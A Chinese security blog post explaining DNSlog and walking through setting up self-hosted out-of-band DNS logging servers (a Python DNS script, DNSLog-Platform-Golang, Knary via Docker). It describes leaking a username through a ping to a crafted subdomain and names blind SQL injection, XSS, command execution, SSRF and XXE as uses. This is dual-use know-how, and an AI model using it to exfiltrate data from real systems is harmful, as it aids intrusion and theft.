<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="DNSlog工具原理搭建及使用, Linux，cybersecurity等">
    <meta name="description" content="keep hungry,keep foolish">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>DNSlog工具原理搭建及使用 | Leaves的博客</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 5.4.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
<link rel="stylesheet" href="/css/prism.css" type="text/css"></head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Leaves的博客</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Leaves的博客</div>
        <div class="logo-desc">
            
            keep hungry,keep foolish
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/GreenLeavesl" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/GreenLeavesl" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/2.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">DNSlog工具原理搭建及使用</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                          <div class="article-tag">
                            <span class="chip bg-color">无标签</span>
                          </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2022-01-06
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <p>DNSlog工具原理搭建及使用</p>
<h1 id="DNSlog工具原理搭建及使用"><a href="#DNSlog工具原理搭建及使用" class="headerlink" title="DNSlog工具原理搭建及使用"></a>DNSlog工具原理搭建及使用</h1><h2 id="DNSlog是什么"><a href="#DNSlog是什么" class="headerlink" title="DNSlog是什么"></a>DNSlog是什么</h2><p>DNS就是将域名解析为ip，用户在浏览器上输入一个域名A.com，就要靠DNS服务器将A.com解析到它的真实ip127.0.0.1，这样就可以访问127.0.0.1服务器上的相应服务。 那么DNSlog是什么。DNSlog就是存储在DNS服务器上的域名信息，它记录着用户对域名<a target="_blank" rel="noopener" href="http://www.baidu.com等的访问信息,类似日志文件./">www.baidu.com等的访问信息，类似日志文件。</a></p>
<h2 id="DNSlog回显原理"><a href="#DNSlog回显原理" class="headerlink" title="DNSlog回显原理"></a>DNSlog回显原理</h2><h3 id="域名分级与域名解析过程-DNS"><a href="#域名分级与域名解析过程-DNS" class="headerlink" title="域名分级与域名解析过程(DNS)"></a>域名分级与域名解析过程(DNS)</h3><p>因特网采用层次树状结构命名方法。域是名字空间中一个可被管理的划分（按机构组织划分），域可被划分为子域，子域可再被划分，即形成了顶级域名、二级域名、三级域名等。从右向左为顶级域名、二级域名、三级域名等，用点隔开。如：<br>tieba.baidu.com</p>
<p>它由三个标号组成， com即为顶级域名，baidu为二级域名，tieba即为三级域名。且域名不分区大小写。<br><img src="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/9b68c684bd7b4ba98cc71145d03da3a8.png"></p>
<p>比如说,我注册了一个为luomiweixiong.com的域名,我将 它的a记录泛解析到139.x.x.x上,这样就实现了无论我记录值填什么他都有解析,并且都指向139.x.x.x,当我向dns服务器发起test.luomiweixiong.com的解析请求时,DNSlog中会记录下他给test.luomiweixiong.com解析,解析值为139.x.x.x.</p>
<h2 id="免费的平台"><a href="#免费的平台" class="headerlink" title="免费的平台"></a>免费的平台</h2><figure class="highlight awk"><table><tbody><tr><td class="code"><pre><span class="line">http:<span class="regexp">//</span>www.dnslog.cn</span><br><span class="line">http:<span class="regexp">//</span>admin.dnslog.link</span><br><span class="line">http:<span class="regexp">//</span>ceye.io</span><br></pre></td></tr></tbody></table></figure>
<h3 id="http-www-dnslog-cn使用方法"><a href="#http-www-dnslog-cn使用方法" class="headerlink" title="http://www.dnslog.cn使用方法"></a><a target="_blank" rel="noopener" href="http://www.dnslog.cn使用方法/">http://www.dnslog.cn使用方法</a></h3><p>（1）Get SubDomain的意思是获取子域名，这里点击完就给我们一个三级域名。复制完后，打开新网页并粘贴在url上，访问<br><img src="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/0d82524f5ab2467ea007e7797fcd2799.png"></p>
<p>（2）在本机实验演示<br>ping命令的时候会用到DNS解析<br><img src="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/c9a5d440f1c146cd93c5e2eb0aa10120.png"><br>ping命令的时候会用到DNS解析<br><img src="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/8b2c969551b84ae693dabb7483636855.png"></p>
<p>解析的日志会把%USERNAME%的值给带出来，因为系统在ping命令之前会将%USERNAME%的值解析出来，然后再和a.com拼接起来，最后ping命令执行将XF.a.com一起发给DNS服务器请求解析域名对应的ip地址，这个过程被记录下来就是DNSlog。<br>原理上只要能进行DNS请求的函数都可能存在DNSlog注入。</p>
<p>dns缓存可能造成记录不刷新，此时更换新的域名即可。</p>
<p>其它平台同理。</p>
<h2 id="DNSlog使用的地方"><a href="#DNSlog使用的地方" class="headerlink" title="DNSlog使用的地方"></a>DNSlog使用的地方</h2><p>目标不让信息显示出来，如果能发送请求，那么就可以尝试咱这个办法——用DNSlog来获取回显<br>（1）SQL注入中的盲注<br>（2）XSS盲打<br>（3）无回显的命令执行<br>（4）无回显的SSRF<br>（5）无回显的XXE（Blind XXE）</p>
<h2 id="搭建自己的dnslog平台"><a href="#搭建自己的dnslog平台" class="headerlink" title="搭建自己的dnslog平台"></a>搭建自己的dnslog平台</h2><p>前提：一台公网ip的VPS和一个域名</p>
<ol>
<li>域名利用freenom网站或eu.org或pp.ua注册即可</li>
</ol>
<ol start="2">
<li>利用Cloudflare进行解析<br>因为Freenom本地的解析在国内不够好用，咱们就换个。<br>注册cloudflare账号</li>
</ol>
<p>配置你的域名</p>
<p>配置NameServer,指向CloudFlare。</p>
<p>xxx.ns.cloudflare.com<br>xxx.ns.cloudflare.com</p>
<p><img src="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/ab25f88fe2b0412d8815a2b6b840ac2d.png"></p>
<p><strong>配置NS记录</strong></p>
<p>分别申请两个DNS记录，NS记录代表子域名log.where.cf的DNS服务器为ns.where,cf</p>
<p><img src="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/bd9d272584b048068138f91cdf029472.png"></p>
<p>测试是否生效<br>网上python2的dns脚本</p>
<figure class="highlight routeros"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment">#/usr/bin/python2</span></span><br><span class="line"><span class="comment"># -*- coding:utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> twisted.internet import reactor, defer</span><br><span class="line"><span class="keyword">from</span> twisted.names import client, dns, error,<span class="built_in"> server</span></span><br><span class="line"><span class="built_in"></span>record={}</span><br><span class="line">class DynamicResolver(object):</span><br><span class="line">    def _doDynamicResponse(self, query):</span><br><span class="line">        name = <span class="string">"query.name.name"</span> #修改域名 </span><br><span class="line">        # 返回指定应答IP</span><br><span class="line">       <span class="built_in"> ip </span>= <span class="string">"x.x.x.x"</span></span><br><span class="line">        <span class="builtin-name">print</span>(name+<span class="string">" ===&gt; "</span>+ip)</span><br><span class="line">        answer = dns.RRHeader(</span><br><span class="line">            <span class="attribute">name</span>=name,</span><br><span class="line">            <span class="attribute">type</span>=dns.A,</span><br><span class="line">            <span class="attribute">cls</span>=dns.IN,</span><br><span class="line">            <span class="attribute">ttl</span>=0, # 这里设置DNS TTL为 0</span><br><span class="line">            <span class="attribute">payload</span>=dns.Record_A(address=b'%s'%ip,ttl=0)</span><br><span class="line">        )</span><br><span class="line">        answers = [answer]</span><br><span class="line">        authority = []</span><br><span class="line">        additional = []</span><br><span class="line">        return answers, authority, additional</span><br><span class="line">    def query(self, query, <span class="attribute">timeout</span>=None):</span><br><span class="line">        return defer.succeed(self._doDynamicResponse(query))</span><br><span class="line">def main():</span><br><span class="line">    factory = server.DNSServerFactory(</span><br><span class="line">        clients=[DynamicResolver(), client.Resolver(<span class="attribute">resolv</span>=<span class="string">'/etc/resolv.conf'</span>)]</span><br><span class="line">    )</span><br><span class="line">    protocol = dns.DNSDatagramProtocol(<span class="attribute">controller</span>=factory)</span><br><span class="line">    reactor.listenUDP(53, protocol)</span><br><span class="line">    reactor.<span class="builtin-name">run</span>()</span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    raise SystemExit(main())</span><br></pre></td></tr></tbody></table></figure>

<p>python2和pip在ubuntu中安装</p>
<figure class="highlight dsconfig"><table><tbody><tr><td class="code"><pre><span class="line"><span class="string">add-apt-repository</span> <span class="string">universe</span></span><br><span class="line"><span class="string">apt</span> <span class="string">update</span> </span><br><span class="line"><span class="string">apt</span> <span class="string">install</span> <span class="string">python2</span></span><br><span class="line"><span class="string">curl</span> <span class="string">https</span>://<span class="string">bootstrap</span>.<span class="string">pypa</span>.<span class="string">io</span>/<span class="string">pip</span>/<span class="string">2</span>.<span class="string">7</span>/<span class="built_in">get-pip.py</span> <span class="built_in">--output</span> <span class="built_in">get-pip.py</span></span><br><span class="line"><span class="string">python2</span> <span class="built_in">get-pip.py</span></span><br></pre></td></tr></tbody></table></figure>
<p><img src="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/87c8f3dafee747089f7932ee1f4fe832.png"></p>
<p><img src="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/43837f9556914a04b831efc331251e52.png"></p>
<p>注：国内域名可能有需要备案问题</p>
<ol start="3">
<li>如果是云服务器，到防火墙中开放自己的53端口<br>临时解决：<br>53端口被占用，<code>lsof -i:53</code>查看pid，<code>kill -9 pid</code>，ubuntu关闭<code>systemctl stop systemd-resolved</code></li>
</ol>
<p>长期生效：<br><code>vim /etc/systemd/resolved.conf</code>,如下图配置，关闭监听。<br><img src="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/ad12406c18914fed89dda111a692dd56.png"><br>接着重启服务, <code>systemctl restart systemd-resolved</code></p>
<p><code>vim /etc/resolv.conf</code><br><img src="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/a17c2377718d44d8b9c2b83b427a9055.png" alt="e12d16e6bb92c997787d2ddf0f15ac5a.png"></p>
<ol start="4">
<li>部署DNS服务<br>将dnslog的liunx版本从github下载到vps中<br><a target="_blank" rel="noopener" href="https://github.com/yumusb/DNSLog-Platform-Golang">https://github.com/yumusb/DNSLog-Platform-Golang</a><br><a target="_blank" rel="noopener" href="https://github.com/lanyi1998/DNSlog-GO/releases/">https://github.com/lanyi1998/DNSlog-GO/releases/</a><br><a target="_blank" rel="noopener" href="https://github.com/chennqqi/godnslog">https://github.com/chennqqi/godnslog</a></li>
</ol>
<p><strong>ubuntu 完全干净的卸载docker</strong></p>
<figure class="highlight vala"><table><tbody><tr><td class="code"><pre><span class="line"><span class="meta">#docker --version</span></span><br><span class="line">apt-<span class="keyword">get</span> autoremove docker docker-ce docker-engine  docker.io  containerd runc</span><br><span class="line"><span class="meta">#删除docker其他没有没有卸载</span></span><br><span class="line">dpkg -l | grep docker</span><br><span class="line">dpkg -l |grep ^rc|awk <span class="string">'{print $2}'</span> |sudo xargs dpkg -P</span><br><span class="line"><span class="meta">#卸载没有删除的docker相关插件(结合自己电脑的实际情况)</span></span><br><span class="line">apt-<span class="keyword">get</span> autoremove docker-ce-*</span><br><span class="line"><span class="meta">#删除docker的相关配置&amp;目录</span></span><br><span class="line">rm -rf /etc/systemd/system/docker.service.d</span><br><span class="line">rm -rf /<span class="keyword">var</span>/lib/docker</span><br><span class="line"><span class="meta">##删除docker的相关配置&amp;目录</span></span><br><span class="line">docker --version</span><br></pre></td></tr></tbody></table></figure>
<h3 id="DNSLog-Platform-Golang"><a href="#DNSLog-Platform-Golang" class="headerlink" title="DNSLog-Platform-Golang"></a>DNSLog-Platform-Golang</h3><ol>
<li><p>下载<br><code>git clone https://github.com/yumusb/DNSLog-Platform-Golang</code></p>
</li>
<li><p>编辑配置文件</p>
<figure class="highlight vim"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">cd</span> DNSLog-Platform-Golang</span><br><span class="line"><span class="keyword">vi</span> config.tomal</span><br></pre></td></tr></tbody></table></figure></li>
</ol>
<figure class="highlight ini"><table><tbody><tr><td class="code"><pre><span class="line"><span class="section">[front]</span></span><br><span class="line"><span class="attr">template</span> = <span class="string">"index.html"</span></span><br><span class="line"><span class="section">[back]</span></span><br><span class="line"><span class="attr">listenhost</span> = <span class="string">"0.0.0.0"</span></span><br><span class="line"><span class="attr">listenport</span> = <span class="number">11111</span></span><br><span class="line"><span class="attr">domains</span> = [ <span class="string">"log.xxx.xx"</span>]</span><br><span class="line"><span class="attr">cname</span> = <span class="string">""</span></span><br><span class="line"><span class="section">[basicauth]</span></span><br><span class="line"><span class="attr">check</span> = <span class="literal">false</span></span><br><span class="line"><span class="attr">username</span> = <span class="string">"yumu"</span></span><br><span class="line"><span class="attr">password</span> = <span class="string">"yumusb"</span></span><br></pre></td></tr></tbody></table></figure>
<ul>
<li>前端模板文件</li>
<li>后端监听的主机、端口、域名、与CNAME响应</li>
<li>HTTP BASIC AUTH的是否打开（check=true）与密码配置</li>
</ul>
<ol start="3">
<li>go环境配置<figure class="highlight vim"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">go</span> env -<span class="keyword">w</span> GO111MODULE=<span class="keyword">on</span></span><br><span class="line"><span class="keyword">go</span> env -<span class="keyword">w</span></span><br></pre></td></tr></tbody></table></figure>
GOPROXY=<a target="_blank" rel="noopener" href="https://goproxy.cn,direct/">https://goproxy.cn,direct</a> #可选，国内机器不能上github则需要执行此处以设置{代}{理}<br><code>go run main.go或者nohup  go run main.go &amp;</code></li>
</ol>
<p><img src="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/2adc4e10f40947479f19482f21e3bd5e.png"></p>
<h3 id="Knary"><a href="#Knary" class="headerlink" title="Knary"></a>Knary</h3><p>二进制文件部署:</p>
<figure class="highlight awk"><table><tbody><tr><td class="code"><pre><span class="line">wget https:<span class="regexp">//g</span>hproxy.com<span class="regexp">/https:/</span><span class="regexp">/github.com/</span>sudosammy<span class="regexp">/knary/</span>releases<span class="regexp">/download/</span>v3.<span class="number">3.1</span>/knary-<span class="number">3.3</span>.<span class="number">1</span>-linux-amd64</span><br><span class="line">chmod +x knary-<span class="number">3.3</span>.<span class="number">1</span>-linux-amd64</span><br><span class="line">mv knary-<span class="number">3.3</span>.<span class="number">1</span>-linux-amd64 knary</span><br><span class="line">./knary</span><br></pre></td></tr></tbody></table></figure>
<p>如果二进制不安全，可以考虑Docker 快速搭建:</p>
<figure class="highlight awk"><table><tbody><tr><td class="code"><pre><span class="line">export GIT_SSL_NO_VERIFY=<span class="number">0</span></span><br><span class="line">git clone http:<span class="regexp">//g</span>hproxy.com<span class="regexp">/https:/</span><span class="regexp">/github.com/</span>sudosammy/knary.git</span><br><span class="line"><span class="comment"># 编辑docker-compose.yaml的信息</span></span><br><span class="line">vim docker-compose.yaml</span><br></pre></td></tr></tbody></table></figure>
<p>环境变量信息有两种配置方式，一种是利用当目前的.env文件，一种是直接配置环境变量environment,也可以混合来用，我这里先配置下CANARY_DOMAIN=CANARY_DOMAIN=log.xxxx.xxx</p>
<figure class="highlight dts"><table><tbody><tr><td class="code"><pre><span class="line"><span class="symbol">version:</span> <span class="string">"3.9"</span></span><br><span class="line"><span class="symbol">services:</span></span><br><span class="line"><span class="symbol">  knary:</span></span><br><span class="line"><span class="symbol">    container_name:</span> knary</span><br><span class="line"><span class="symbol">    hostname:</span> knary</span><br><span class="line"><span class="symbol">    restart:</span> always</span><br><span class="line"><span class="symbol">    env_file:</span></span><br><span class="line">      - .env <span class="meta"># as commented below, you can also use the `environment` key to specify variables. This will overwrite anything in `env_file`</span></span><br><span class="line">    <span class="meta"># environment:</span></span><br><span class="line">    <span class="meta">#   - DNS=true</span></span><br><span class="line">    <span class="meta">#   - HTTP=true</span></span><br><span class="line">    <span class="meta">#   - BIND_ADDR=127.0.0.1</span></span><br><span class="line">       - CANARY_DOMAIN=log.log4j2.ga</span><br><span class="line">    <span class="meta"># (etc. etc.)</span></span><br><span class="line"><span class="symbol">    build:</span> .</span><br><span class="line"><span class="symbol">    ports:</span></span><br><span class="line">      - <span class="string">"80:80"</span></span><br><span class="line">      - <span class="string">"443:443"</span></span><br><span class="line">      - <span class="string">"53:53/udp"</span></span><br><span class="line"><span class="symbol">    volumes:</span></span><br><span class="line">      - ./certs:<span class="meta-keyword">/certs/</span></span><br></pre></td></tr></tbody></table></figure>
<p>编辑一份环境变量:</p>
<figure class="highlight routeros"><table><tbody><tr><td class="code"><pre><span class="line">vim .env</span><br><span class="line"><span class="comment"># 内容</span></span><br><span class="line"><span class="comment"># RENAME ME TO .env</span></span><br><span class="line"><span class="attribute">DNS</span>=<span class="literal">true</span></span><br><span class="line"><span class="attribute">HTTP</span>=<span class="literal">true</span></span><br><span class="line"><span class="attribute">BIND_ADDR</span>=0.0.0.0</span><br><span class="line"><span class="attribute">CANARY_DOMAIN</span>=log.log4j.ga</span><br><span class="line"><span class="attribute">LETS_ENCRYPT</span>=xxxxx@qq.com</span><br><span class="line"><span class="attribute">EXT_IP</span>=1x1.xxx.1xx.x3</span><br><span class="line"><span class="attribute">DEBUG</span>=<span class="literal">true</span></span><br><span class="line"><span class="attribute">LOG_FILE</span>=knary.log</span><br></pre></td></tr></tbody></table></figure>
<p>有两种方法，快速配置HTTPS证书:</p>
<p>1)自签名证书</p>
<p>当前目录创建一个cert文件夹</p>
<p><code>mkdir certs</code><br>openssl创建证书</p>
<p><code>sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout ./certs/selfsigned.key -out ./certs/knary.crt</code><br>信息可以随意填</p>
<p>2)Let’s Encrypt 免费https，Kanry自带，只需要配置好邮箱即可，推荐使用这种!</p>
<p>docker-compose启动</p>
<figure class="highlight awk"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment"># 卸载原先docker</span></span><br><span class="line">apt-get remove -y remove docker</span><br><span class="line"><span class="comment"># 安装最新docker</span></span><br><span class="line">curl -fsSL https:<span class="regexp">//g</span>et.docker.com | bash -s docker --mirror Aliyun</span><br><span class="line"><span class="comment"># 安装docker-compose</span></span><br><span class="line">sudo curl -L </span><br><span class="line"><span class="string">"https://ghproxy.com/https://github.com/docker/compose/releases/download/v2.2.2/docker-compose-$(uname -s)-$(uname -m)"</span> -o <span class="regexp">/usr/</span>bin/docker-compose</span><br><span class="line">sudo chmod +x <span class="regexp">/usr/</span>bin/docker-compose</span><br></pre></td></tr></tbody></table></figure>
<p>Ubuntu构建过程可能会报错,修改/etc/resolv.conf的值为这个即可</p>
<figure class="highlight apache"><table><tbody><tr><td class="code"><pre><span class="line"><span class="attribute">nameserver</span> <span class="number">8.8.8.8</span></span><br><span class="line"><span class="attribute">nameserver</span> <span class="number">114.114.114.114</span></span><br><span class="line"><span class="attribute">nameserver</span> <span class="number">127.0.0.53</span></span><br><span class="line"><span class="attribute">nameserver</span> <span class="number">223.5.5.5</span></span><br><span class="line"><span class="attribute"><span class="nomarkup">options</span></span> edns<span class="number">0</span></span><br></pre></td></tr></tbody></table></figure>
